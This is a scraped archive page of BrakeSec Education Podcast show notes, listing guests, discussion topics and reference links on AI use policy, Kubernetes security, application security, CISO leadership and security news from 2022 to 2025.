BrakeSec Education Podcast
A podcast about the world of Cybersecurity, Privacy, Compliance, and Regulatory issues that arise in today's workplace. Co-hosts Bryan Brake, Brian Boettcher, and Amanda Berlin teach concepts that aspiring Information Security professionals need to know, or refresh the memories of seasoned veterans.Youtube exclusive! Mick Douglas discussing Sensible AI use poilcy, RAGs, and how to get up to speed for your business' sake
Youtube Video: https://www.youtube.com/watch?v=hcbj94kMCJE
Questions and topics: (please feel free to update or make comments for clarifications)
* Everyone wants us to use AI, but only when it benefits them
* “Don’t use AI to submit your resume to our company”
* “Do know how to use AI”
* “Don’t use AI to answer the interview questions”
* AI implementations range from “super easy” to “crazy easy”
* If you already know how to use AI
* Setting it up wrong can really hurt your company
* Tasks in AI that can get you into trouble
* Contract summarizing
* P&C docs
* Sensitive business proposals
* Using code from an AI that lacks a license
* A Sensible AI policy?
* Should a company already have one, even if they aren’t using AI?
* Maybe like an “AI Code of Conduct”
* “Cool if you use it, but don’t put XX in it”
Additional information / pertinent LInks (Would you like to know more?):
Alignment in data science: https://techcommunity.microsoft.com/blog/azuredevcommunityblog/the-true-meaning-of-alignment-decision-modeling-in-data-science/3258269
https://www.amazon.com/Alignment-Problem-Machine-Learning-Values/dp/0393635821
https://blogs.nvidia.com/blog/what-is-retrieval-augmented-generation/
https://ai.meta.com/research/
https://www.youtube.com/watch?v=oVapD2OKCZw
https://github.com/danielmiessler/Fabric - prompts AI in github
https://x.com/thealexbanks/status/1862124708163944859
https://hbr.org/2018/01/podcast-ideacast
https://www.forbes.com/councils/forbestechcouncil/2024/11/15/why-85-of-your-ai-models-may-fail/
https://www.tomshardware.com/tech-industry/artificial-intelligence/research-shows-more-than-80-of-ai-projects-fail-wasting-billions-of-dollars-in-capital-and-resources-report
https://github.com/InfoSecInnovations/concierge
Show points of Contact:
Amanda Berlin: https://www.linkedin.com/in/amandaberlin/
Brian Boettcher: https://www.linkedin.com/in/bboettcher96/
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Jay Beale discusses his K8s class at BlackHat, Kubernetes developments, and mental health
Youtube Video at: https://www.youtube.com/watch?v=yHPvGVfPgjI
Jay Beale is a principal security consultant and CEO/CTO for InGuardians. He is the architect of multiple open source projects, including the Peirates attack tool for Kubernetes (in Kali Linux), the Bustakube CTF Kubernetes cluster, and Bastille Linux. Jay created and leads the Kubernetes CTF at DEF CON and previously helped in the Kubernetes project's Security efforts. He’s co-written eight books and given many public talks at Black Hat, DEF CON, RSA, CanSecWest, Blue Hat, ToorCon, DerbyCon, WWHF, HushCon and others. He teaches the highly-rated Black Hat class, “Attacking and Protecting Kubernetes, Linux, and Containers.” He has served on the review board of the O’Reilly Security Conference, the board of Mitre’s CVE-related Open Vulnerability and Assessment Language, and been a member of the HoneyNet project. He’s briefed both Congress and the White House.
Questions and topics: (please feel free to update or make comments for clarifications)
* Kubernetes vs. Docker vs. LXC vs. VMs - why did you settle on K8s?
* What’s new with k8s? Version 1.33? Do you always implement the latest version in your CTF, or something that is deliberately vulnerable? (https://www.loft.sh/blog/kubernetes-v-1-33-key-features-updates-and-what-you-need-to-know)
* When you are making a CTF, what’s your methodology? Threat model then verify? Code review? Github pull requests?
* Story time; Not the first year you’ve done this(?), have participants ever surprised you finding something you didn’t expect?
* If I’m running K8s at my workplace, what should be bare minimum k8s security I should implement? Any security controls that I should implement that might cause performance or are ‘nice-to-have’ but may run counter to how orgs use k8s that I should be concerned about implementing?
Additional information / pertinent LInks (Would you like to know more?):
https://kubernetes.io/
DEF CON Kubernetes CTF: https://containersecurityctf.com/
Black Hat training: https://www.blackhat.com/us-25/training/schedule/index.html#0-day-unnecessary-attacking-and-protecting-kubernetes-linux-and-containers-45335
https://www.bustakube.com/
https://github.com/inguardians/peirates
Rory McCune’s blog: https://raesene.github.io/
https://www.oreilly.com/library/view/production-kubernetes/9781492092292/ - O’Reilly book: Production Kubernetes
Show points of Contact:
Amanda Berlin: https://www.linkedin.com/in/amandaberlin/
Brian Boettcher: https://www.linkedin.com/in/bboettcher96/
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Socvel intel threat quiz, Pearson Breached, nintendo bricking stuff, and kevintel.com
socvel.com/quiz if you want to play along!
Check out the BrakeSecEd Twitch at https://twitch.tv/brakesec
join the Discord: https://bit.ly/brakesecDiscord
Music:
Music provided by Chillhop Music: https://chillhop.ffm.to/creatorcred
"Flex" by Jeremy Blake
Courtesy of Youtube media library
Bronwen Aker - harnessing AI for improving your workflows
Guest Info:
-
Name: Bronwen Aker
-
Contact Information (N/A): https://br0nw3n.com/
-
Time Zone(s): Pacific, Central, Eastern
–Copy begins–
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time based on new information and experiences, and do not represent views of past, present, or future employers.
Recorded: https://youtube.com/live/guhM8v8Irmo?feature=share
Show Topic Summary: By harnessing AI, we can assist in being proactive in discovering evolving threats, safeguard sensitive data, analyze data, and create smarter defenses. This week, we’ll be joined by Bronwen Aker, who will share invaluable insights on creating a local AI tailored to your unique needs. Get ready to embrace innovation, transform your work life, and contribute to a safer digital world with the power of artificial intelligence! (heh, I wrote this with the help of AI…)
Questions and topics: (please feel free to update or make comments for clarifications)
-
Things that concern Bronwen about AI: (https://br0nw3n.com/2023/12/why-i-am-and-am-not-afraid-of-ai/)
Data Amplification: Generative AI models require vast amounts of data for training, leading to increased data collection and storage. This amplifies the risk of unauthorized access or data breaches, further compromising personal information. -
Data Inference: LLMs can deduce sensitive information even when not explicitly provided. They may inadvertently disclose private details by generating contextually relevant content, infringing on individuals’ privacy.
-
Deepfakes and Misinformation: Generative AI can generate convincing deepfake content, such as videos or audio recordings, which can be used maliciously to manipulate public perception or deceive individuals. (Elections, anyone?)
-
Bias and Discrimination: LLMs may inherit biases present in their training data, perpetuating discrimination and privacy violations when generating content that reflects societal biases.
-
Surveillance and Profiling: The utilization of LLMs for surveillance purposes, combined with big data analytics, can lead to extensive profiling of individuals, impacting their privacy and civil liberties.
-
Setting up a local LLM? CPU models vs. gpu models
pros/cons? Benefits? -
What can people do if they lack local resources?
Cloud instances? Ec2? Digital Ocean? Use a smaller model? -
https://www.theregister.com/2025/04/12/ai_code_suggestions_sabotage_supply_chain/
-
AI coding assets are hallucinating package names
-
5.2 percent of package suggestions from commercial models didn't exist, compared to 21.7 percent from open source or openly available models
-
Attackers can then create malicious packages matching the invented name, some are quite convincing with READMEs, fake github repos, even blog posts
-
An evolution of typosquatting named “slopsquating” by Seth Michael Larson of Python Software Foundation
-
Threat actor "_Iain" posted instructions and videos using AI for mass-generated fake packages from creation to exploitation
Additional information / pertinent LInks (Would you like to know more?):
-
https://www.reddit.com/r/machinelearningnews/s/HDHlwHtK7U
-
https://br0nw3n.com/2024/06/llms-and-prompt-engineering/ - Prompt Engineering talk
-
https://br0nw3n.com/wp-content/uploads/LLM-Prompt-Engineering-LayerOne-May-2024.pdf (slides)
-
Daniel Meissler ‘Fabric’ - https://github.com/danielmiessler/fabric
-
Ollama tutorial (co-founder of ollama - Matt Williams): https://www.youtube.com/@technovangelist
-
https://www.whiterabbitneo.com/ - AI for DevSecOps, Security
-
https://blogs.nvidia.com/blog/what-is-retrieval-augmented-generation/
-
https://www.youtube.com/watch?v=OuF3Q7jNAEc - neverending story using an LLM
Show points of Contact:
Amanda Berlin: https://www.linkedin.com/in/amandaberlin/
Brian Boettcher: https://www.linkedin.com/in/bboettcher96/
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Published on: April 22, 2025
post-bsides SD discussion, EPSS, the answer I should have given, and 'Lord Brake'
March23: buy browser extensions, attackers don't need exploits, socvel CTI quiz
steam distributes malware in game form, RDP open from DOGE servers, hacking a supply chain for 50K
Youtube VOD: https://www.youtube.com/watch?v=zu_smyQGvG4
-
https://cyberintel.substack.com/p/doge-exposes-once-secret-government
-
https://x.com/SteamDB/status/1889610974484705314 – supply chain issues can crop up anywhere… are you blocking people from steam and popular software downloads online?
-
https://www.landh.tech/blog/20250211-hack-supply-chain-for-50k/
-
https://medium.com/@cyberengage.org/rethinking-incident-response-from-picerl-to-dair-7b153a76e044
-
https://www.youtube.com/watch?v=3HRkKznJoZA <- 100 digits of pi
-
https://www.youtube.com/watch?v=rz4Dd1I_fX0 <- periodic table song
Additional information / pertinent LInks (Would you like to know more?):
-
https://www.socvel.com/quiz/
-
https://xphantom.nl/posts/Offensive-Security-Lab/
Show points of Contact:
Amanda Berlin: https://www.linkedin.com/in/amandaberlin/
Brian Boettcher: https://www.linkedin.com/in/bboettcher96/
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
discord: https://discord.gg/brakesec
Twitch Channel: https://twitch.tv/brakesec
Music: https://chillhop.ffm.to/creatorcred "Flex" by Jeremy Blake
Courtesy of Youtube media library
Published on: February 17, 2025Tanya Janca Talks secure coding, Semgrep Academy, and community building, and more!
Check out the BrakeSecEd Twitch at https://twitch.tv/brakesec
Join the Discord! https://discord.gg/brakesec
#youtube VOD (in 1440p): https://www.youtube.com/watch?v=axQWGyd79NM
Questions and topics:
Bsides Vancouver discussion
Semgrep Community and Academy
Building communities
What are ‘secure guardrails’
Reducing barriers between security and developers
How to sell security to devs: “hey, if you want to see us less, buy/use this?”
“Security is your barrier, but we have goals that we can’t reach without your help.”
https://wehackpurple.com/devsecops-worst-practices-artificial-gates/
How are you seeing things like AI being used to help with DevOps or is it just making things more complicated? Not just helping write code, but infrastructure Ops, software inventories, code repo hygiene, etc?
OWASP PNW https://www.appsecpnw.org/
Alice and Bob coming next year!
Additional information / pertinent LInks (Would you like to know more?):
shehackpurple.ca
Semgrep (https://semgrep.dev/)
https://aliceandboblearn.com/
https://academy.semgrep.dev/ (free training)
Netflix ‘paved roads’: https://netflixtechblog.com/how-we-build-code-at-netflix-c5d9bd727f15
https://en.wikipedia.org/wiki/Nudge_theory
https://www.perforce.com/blog/qac/what-is-linting
https://www.youtube.com/watch?v=FSPTiw8gSEU
https://techhq.com/2024/02/air-canada-refund-for-customer-who-used-chatbot/
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@BrakeSecEd
Twitch Channel: https://twitch.tv/brakesec
Published on: June 1, 2024
Josh Grossman - building Appsec programs, bridging security and developer gaps
Youtube VOD: https://youtu.be/G3PxZFmDyj4
#appsec, #owasp, #ASVS, #joshGrossman, #informationsecurity, #SBOM, #supplychain, #podcast, #twitch, #brakesec, #securecoding, #Codeanalysis
Questions and topics:
1. The background to the topic, why is it something that interests you?
How do you convince developers to take your course?
2. What do you think the root cause of the gap is?
3. Who is causing the gaps? (‘go fast’ culture, overzealous security, GRC requirements, basically everyone?)
4. Where do gaps begin? Is it the ‘need’ to ‘move fast’?
5. What can devs do to involve security in their process? Sprint planning? SCA tools?
6. How have you seen this go wrong at organizations?
7. How important is it to have security early in the product development process?
8. What sort of challenges do you think mainstream security people face in AppSec scenarios?
9. How does Product Security differ from Application Security? (what if the product is an application?)
10. What are the key development concepts that security people need to be familiar with to effectively get involved in AppSec/ProdSec?
11.. How do you suggest a security team approach AppSec/ProdSec?
Leadership buy-in
Effective/valuable processes
Tools should achieve a goal
12. SBOM - NTIA is asking for it, How to get dev teams to care.
13. Key takeaways?
Additional information / pertinent LInks (Would you like to know more?):
BlackHat Training: https://www.blackhat.com/us-24/training/schedule/index.html#accelerated-appsec--hacking-your-product-security-programme-for-velocity-and-value-virtual-37218
https://www.walkme.com/blog/leadership-buy-in/
https://www.bouncesecurity.com/
https://www.teamgantt.com/blog/raci-chart-definition-tips-and-example
https://www.cisa.gov/sbom
SCA Tools https://chpk.medium.com/top-10-software-composition-analysis-sca-tools-for-devsecops-85bd3b7512dd
https://semgrep.dev/
https://www.linkedin.com/in/joshcgrossman
https://owasp.org/www-project-application-security-verification-standard/
https://github.com/OWASP/ASVS/tree/master/5.0
https://owasp.org/www-project-cyclonedx/
https://joshcgrossman.com/
PyCon talk about custom security testing: https://www.youtube.com/watch?v=KuNZzDjvMlg
Michal's Black Hat course - Accurate and Scalable: Web Application Bug Hunting: https://www.blackhat.com/us-24/training/schedule/index.html#accurate-and-scalable-web-application-bug-hunting-37210
https://www.blackhat.com/us-24/training/schedule/index.html#accurate-and-scalable-web-application-bug-hunting-372101705524544
ASVS website: https://owasp.org/asvs
Lightning talk I did recently about OWASP: https://www.bouncesecurity.com/eventspast#f86548cb37cb2a82728b1762bd1b7aee
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Managing messaging with management, becoming a CISO with Mary Gardner from Goldiknox
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time based on new information and experiences and do not represent views of past, present, or future employers.
Recorded: 08 Apr 2024
Youtube VOD: https://www.youtube.com/watch?v=K8qApvsFtqw
Show Topic Summary:
If you want to get in the mind of a board member, I submit to you my discussion with Mary Gardner we did last night on #brakesec #education. Join Mary and I as we discuss the functions of a board, messaging to various levels of leadership and teams, and what it takes to make that leap to being a CISO.
And when you're done, and you need someone to help your org get more mature, contact the team at GoldiKnox.
#cybersecurity #informationsecurity #ciso #leadership #GRC
Questions and topics:
-
https://hbr.org/2023/05/boards-are-having-the-wrong-conversations-about-cybersecurity
-
“Just 69% of responding board members see eye-to-eye with their chief information security officers (CISOs). Fewer than half (47%) of members serve on boards that interact with their CISOs regularly, and almost a third of them only see their CISOs at board presentations. “
-
They obviously have different priorities, so what brings everyone to the table to discuss? Are they even worried about security?
-
-
Tactical goals vs. org goals and aligning them
-
What are boards most worried about these days?
-
Staying relevant in the face of AI?
-
What tech will protext them from the newest threats?
-
-
GRC is forced security, security is completely optional, Compliance requires some sort of security
Additional information / pertinent LInks (Would you like to know more?):
-
Research organizations (gartner, forrester, etc)
-
https://hbr.org/2022/11/is-your-board-prepared-for-new-cybersecurity-regulations
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Discord: https://discord.gg/brakesec
Published on: April 9, 2024p2-accidentalCISO, building trust in new places
Full Youtube VOD: https://www.youtube.com/watch?v=uX7odQTBkyQ
Questions and topics:
-
Let’s talk about Mindful Business Podcast
-
What’s the topics you cover?
-
-
Topic #1: discuss your experiences when you were a new leader.
-
What worked? What didn't? What would you have done differently?
-
Do you emulate your manager's style? What have been your go-to management resources?
-
What is a good piece of advice that you’ve been given or that you impart to others that relates to leadership?
-
-
Topic #2: building/Operating SaaS products (we can discuss securing them, what functions should be table stakes (data structures, logging, etc)
-
Topic #3: What are bare minimums for building ‘secure’ Saas products in your particular field? And how do you balance security with a positive user experience (i. e. getting customers to buy into MFA/OAUTH, OTA updates
-
Topic #4: Do many SaaS products get over-integrated? Is the need for integration override best practices in security?
Additional information / pertinent LInks (Would you like to know more?):
-
Twitter/Mastodon:
https://twitter.com/AccidentalCISO
https://infosec.exchange/@accidentalciso -
The Mindful Business Security Show:
https://www.mindfulsmbshow.com/
https://twitter.com/mindfulsmbshow
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Published on: February 13, 2024AccidentalCISO on BrakeSecEd, talking Leadership, SaaS development, and Appsec
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time based on new information, and do not represent views of past, present, or future employers.
Recorded: 28 Jan 2024
Youtube VOD: https://youtube.com/live/uX7odQTBkyQ
Questions and topics:
-
Let’s talk about Mindful Business Podcast
-
What’s the topics you cover?
-
-
Topic #1: discuss your experiences when you were a new leader.
-
What worked? What didn't? What would you have done differently?
-
Do you emulate your manager's style? What have been your go-to management resources?
-
What is a good piece of advice that you’ve been given or that you impart to others that relates to leadership?
-
-
Topic #2: building/Operating SaaS products (we can discuss securing them, what functions should be table stakes (data structures, logging, etc)
-
Topic #3: What are bare minimums for building ‘secure’ Saas products in your particular field? And how do you balance security with a positive user experience (i. e. getting customers to buy into MFA/OAUTH, OTA updates
-
Topic #4: Do many SaaS products get over-integrated? Is the need for integration override best practices in security?
Additional information / pertinent LInks (Would you like to know more?):
-
Twitter/Mastodon:
https://twitter.com/AccidentalCISO
https://infosec.exchange/@accidentalciso -
The Mindful Business Security Show:
https://www.mindfulsmbshow.com/
https://twitter.com/mindfulsmbshow
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Published on: February 2, 20241st show of 2024! Our 10th Anniversary...
It's our 10th anniversary and the first show of our 2024 season!
Amanda was on "7 minute security"
https://7minsec.com/projects/podcast
Check out the complete VOD at https://youtu.be/vbmEtkxhAMg
Explicit language warning
Published on: January 9, 2024
Brakesec Call to Action 2023
Youtube Video: https://youtu.be/IUDPlQaQg8M
https://forms.gle/rf145MoN7cskwMjf8
is the link to the survey. Your information (should you choose to identify yourself) will not be shared outside of the BrakeSec Team.
Thank all of you for listening and for your input.
RSS feed for the audio podcast is at https://www.brakeingsecurity.com/rss
website: https://www.brakeingsecurity.com
How to get more headcount, BLUFFs Vulnerability, and Ranty Clause debuts!
Show Topic Summary:
Ms. Berlin proposes a question of how to gather more headcount with metrics, we discuss the BLUFFS bluetooth vulnerability, and “Ranty Claus” talks about CISA’s remarks of putting the onus on device product makers to remove choice for customers and implement secure defaults.
#youtube VOD: https://www.youtube.com/watch?v=emcAzTx9z0c
Questions and topics:
Additional information / pertinent LInks (Would you like to know more?):
-
https://www.cisa.gov/resources-tools/resources/stop-passing-buck-cybersecurity
-
Examples of companies forcing changes https://www.bleepingcomputer.com/news/microsoft/microsoft-will-roll-out-mfa-enforcing-policies-for-admin-portal-access/
-
https://github.com/aya-rs/aya - eBPF implementation in Rust
-
https://www.darkreading.com/endpoint-security/critical-logofail-bugs-secure-boot-bypass-millions-pcs
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: @bryanbrake on Mastodon.social, https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Twitter: @brakesec
Youtube channel: https://youtube.com/c/BDSPodcast
Twitch Channel: https://twitch.tv/brakesec
Published on: December 4, 202325Oct - okta breached (again), Energy company hit by supply chain attack, and you can help hire the best people
Subscribe on Twitch using Amazon Prime and watch us live: https://twitch.tv/brakesec
Check out our VODs on Youtube: https://www.youtube.com/@BrakeSecEd
Join the BrakeSecEd discord: https://discord.gg/brakesec
News:
https://www.darkreading.com/remote-workforce/1password-latest-victim-okta-customer-service-breach
https://www.documentcloud.org/documents/24075435-bhi-notice
https://www.shacknews.com/article/137505/ransomware-group-capcom-2020-arrested
https://www.nasdaq.com/articles/three-cybersecurity-sectors-that-resist-economic-downturns
Published on: October 26, 2023
Nicole Sundin - CPO at Axio - SEC compliance, usable security, setting up risk mgmt programs
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time, and do not represent views of past, present, or future employers.
Guest Bio: Nicole is the Chief Product Officer at Axio. Nicole has spent her career building awareness around the benefits of usable security and human-centered security as a way to increase company revenue and create a seamless user experience.
Youtube VOD Link: https://youtube.com/live/tFaAB9an47g
Questions and topics: Usable security: is it an oxymoron?
What determines if the security is ‘usable’ or no? We sacrifice security for a better UX, what can be done to alleviate that? Or is it some sort of sliding scale in “poor UX, amazing security or awesome UX, poor security” Examples of poor UX for ‘people’: MFA, and password managers.
SEC updates and ‘material events’ and how that would affect security, IR, and other company reporting functions.
Also, additional documentation (Regulation S-K Item 106) https://www.linkedin.com/posts/nicole-sundin-5225a1149_sec-adopts-rules-on-cybersecurity-risk-management-activity-7090065804083290112-ISD8
Are companies ready to talk about their cybersecurity? Can the SEC say “you’re not doing enough?”
What is ‘enough’?
Are we heading toward yet another audit needed for public companies, similar to SOX?
When does an 8-K get publicly disclosed?
Materiality is based on a “reasonable investor”?
So, you don’t need to announce that until you’re certain, and it’s based on what you can collect? Cyber Risk Management and some good examples of how to set up a proper cyber risk organization
Additional Links:
http://web.mit.edu/Saltzer/www/publications/protection/Basic.html
https://www.sec.gov/news/press-release/2023-139
https://www.sec.gov/news/statement/munter-statement-assessing-materiality-030922
https://www.nasa.gov/centers/ames/research/technology-onepagers/hc-computing.html
https://securityscorecard.com/blog/what-is-cyber-security-performance-management/
Published on: September 23, 2023
John Aron, letters of marque, what does a "junior" job look like with AI?
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time, and do not represent views of past, present, or future employers.
Guest Bio: John is the CEO of Aronetics. An avid climber and runner, John has spoken at many conferences about topics like ZeroTrust, BIOS/UEFI security, communication security, and malware. Aronetics is a technology-enabled service provider.
Youtube VOD: https://youtube.com/live/5dIVTwVZLAU
Linkedin VOD: https://www.linkedin.com/video/live/urn:li:ugcPost:7101738254823030784
Show Topic Summary:
John joins us to discuss “letters of Marque” in an effort for hackers to ‘hack back’... the overreliance on automation, and communication siloes. We also talk about what a ‘junior position’ in infosec looks like with AI doing all the “Level 1 SOC Analyst” type roles normally given to someone fresh to the security industry.
Questions and topics:
-
Is infosec over reliant on automation? Automation comes with its own challenges.
-
Documentation woes
-
Automation is usually found in userland
-
Aronetics’ Thor provides defense and counter-offense tamper-proof technology digitally tied to
Letter of Marque - good idea, or geopolitical disaster waiting to happen?
Siloes and communication -best ways to overcome those in an org and outside?
How do we overcome siloing?
Overcoming security challenges?Identity management - 2FA is everywhere, there’s already ways around 2FA, so what now? 3FA? Biometrics? Make everyone carry around physical tokens that we can lose?
Blog post: https://www.aronetics.com/post-quantum-cryptography/
What do we need to protect against? Nation states with quantum computers? Rubber hose cryptography?
Crime thrives in areas of low visibility. https://www.aronetics.com/unknown/
https://www.aronetics.com/inside-the-breach/ (threat detection - the crime thrives in low vis areas)
Show points of Contact:
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/c/BDSPodcast
Twitch Channel: https://twitch.tv/brakesec
Amanda Berlin: @[email protected] (Mastodon) @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: @bryanbrake on Mastodon.social
Published on: September 3, 2023Megan Roddie - co-author of "Practical Threat Detecion Engineering"
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time, and do not represent views of past, present, or future employers.
Buy here: https://subscription.packtpub.com/book/security/9781801076715
Amazon Link: https://packt.link/megan
Youtube VOD: https://www.youtube.com/watch?v=p1_jQa9OQ2w
Show Topic Summary:
Megan Roddie is currently working as a Senior Security Engineer at IBM. Along with her work at IBM, she works with the SANS Institute as a co-author of FOR509, presents regularly at security conferences, and serves as CFO of Mental Health Hackers. Megan has two Master's degrees, one in Digital Forensics and the other in Information Security Engineering, along with many industry certifications in a wide range of specialties. When Megan is not fighting cybercrime, she is an active competitor in Muay Thai/Kickboxing. She is a co-author of “Practical Threat Detection Engineering” from Packt publishing, on sale now in print and e-book. Buy here: https://subscription.packtpub.com/book/security/9781801076715
https://packt.link/megan ← Amazon redirect link that publisher uses if you want something easier on the notes
Questions and topics:
-
Of the 3 models, which do you find you use more and why? (PoP, ATT&CK, kill chain)
-
What kind of orgs have ‘detection engineering’ teams? What roles are involved here, and can other teams (like IR) be involved or share a reverse role there?
-
Lab setup requires an agent… any agent for ingestion or something specific?
-
How does Fleet or data ingestion work for Iot/Embedded device testing? Anything you suggest?
-
How important is it to normalize your log output for ingestion? (app, web, server all tell the story)
Additional information / pertinent LInks (Would you like to know more?):
-
Unified Kill Chain: https://www.unifiedkillchain.com/
-
ATT&CK: https://attack.mitre.org/
-
D3FEND matrix BrakeSec show from 2021: https://brakeingsecurity.com/2021-023-d3fend-framework-dll-injection-types-more-solarwinds-infections
-
Pyramid of Pain: https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
-
https://www.securitymagazine.com/articles/98486-435-million-the-average-cost-of-a-data-breach
-
https://medium.com/@gary.j.katz (per Megan, ‘it’s basically Chapter 11 of the book’)
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: @bryanbrake on Mastodon.social, Twitter, bluesky
Brakesec Website: https://www.brakeingsecurity.com
Twitter: @brakesec
Youtube channel: https://youtube.com/c/BDSPodcast
Twitch Channel: https://twitch.tv/brakesec
Published on: August 25, 2023meeting new people, walking on your keyboard causes issues, even google gets phone numbers wrong.
Check out our sponsor (BLUMIRA) at https://blumira.com/brake
youtube channel link: https://youtube.com/c/BDSPodcast
Full video on our youtube Channel! https://www.youtube.com/watch?v=BkBeLuM_urk
https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
https://www.darkreading.com/remote-workforce/hacker-infected-foiled-by-own-infostealer
https://therecord.media/cisa-warnings-adobe-microsoft-citrix-vulnerabilities
https://therecord.media/airline-customer-support-phone-number-fraud-google
https://twitter.com/Shmuli/status/1680669938468499458
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
https://www.jdsupra.com/legalnews/tabletop-exercises-as-risk-mitigation-5278057/
https://bevyengine.org/ - Rust game engine
https://godotengine.org/ - a more mature Rust game engine
https://flappybird.io/ - which I suck at, BTW
Intro/outro music:
"Flex" by Jeremy Blake
Courtesy of YouTube Music Library (used with proper permissions)
Published on: July 21, 2023
Bsides Seattle and Austin, SecureBoot patch, and more
BrakeSec Show Outline – No Guest
Youtube VOD: https://youtube.com/live/UGRaRSYj7kc
Published on: May 27, 2023
lynsey wolf, conducting insider threat investigations, CASB and UEBA utlization to good use.
3CX supply chain attack, Mark Russinovich and Sysinternals, CISA ransomware notifications, and emotional intelligence
Youtube VOD: https://www.youtube.com/watch?v=afZHiBUr-2g
Dish Network is still busted, John Deere avoiding OSS requests, Is DAST dead?
Nickolas Means talks about Security, Devops velocity, blameless orgs, and conferences infosec should attend
Published on: March 4, 2023
SPECIAL INTERVIEW: John Aron and Jerod Brennen
BrakeSec Show Outline (all links valid as of 27 Jan 2023, subject to change)
Published on: February 10, 2023
Layoff discussions, another TMO breach, OneNote Malware, and more!
| Lots of Layoffs (meta, Microsoft, Amazon, Sophos, Alphabet, Google) talk about the future effects of that, did it affect security? Attack surface management is risk management, Breaches and the TSA no-fly list leaked, and more! |
Full youtube video: https://www.youtube.com/watch?v=1Dgq8FpnWPw
| Questions and/or potential sub-topics (5 minimum): | |
| Layoffs (fear, uncertainty, doubt), what it means for people, | |
| https://www.lollydaskal.com/leadership/5-warning-signs-you-are-being-led-by-a-weak-leader/ | |
| “No fly list leaked” https://www.vice.com/en/article/93a4p5/us-no-fly-list-leaks-after-being-left-in-an-unsecured-airline-server | |
| Attack Surface Management: https://flashpoint.io/blog/what-is-attack-surface-management/ | |
| https://securityaffairs.com/141102/hacking/eof-cisco-routers-exposed-rce.html | |
| https://www.linkedin.com/posts/threatintelligence_threat-intel-cheat-sheet-by-cyber-threat-activity-7021035081184026624-3GWH? (issues with "step 0") |
| Additional information / pertinent Links (would you like to know more?): |
| https://www.sec.gov/ix?doc=/Archives/edgar/data/0001283699/000119312523010949/d641142d8k.htm - TMO’s 8k filing |
| Show Points of Contact: |
| Amanda Berlin: @infosystir @hackershealth |
| Brian Boettcher: @boettcherpwned |
| Bryan Brake: @bryanbrake @[email protected] |
| Website: https://www.brakeingsecurity.com Twitch: https://twitch.tv/brakesec |
GPS car hacks, Google Threat report, notable topics of 2020, satellite threat modelling, twitter breach(?)
| topics | |
| |
| |
| |
| |
| |
| |
| Show Points of Contact: |
| Amanda Berlin: @infosystir @hackershealth |
| Brian Boettcher: @boettcherpwned |
| Bryan Brake: @bryanbrake @[email protected] |
| Website: https://www.brakeingsecurity.com Twitch: https://twitch.tv/brakesec |
Josh-Whalen-risk-management-data_visualization-tools, value-creating activities -p2
Full stream video on Youtube: https://youtu.be/i1xpAfNFCvY
John's Youtube channel, to find more training/contact information: https://www.youtube.com/channel/UC3ctyx980M8jLa_cEiQveLQ
https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration
ADKAR model: https://www.prosci.com/methodology/adkar
CCE framework: https://inl.gov/cce/
Dashboard (non-sponsored link): https://monday.com
Diagrammming tool: https://figma.com
https://www.sciencedirect.com/topics/computer-science/system-analysis
Amazon book: https://www.amazon.com/Engineering-Safer-World-Systems-Thinking/dp/0262533693
Published on: December 20, 2022John Whalen, data visualization tools, risk management, handling org risk-p1
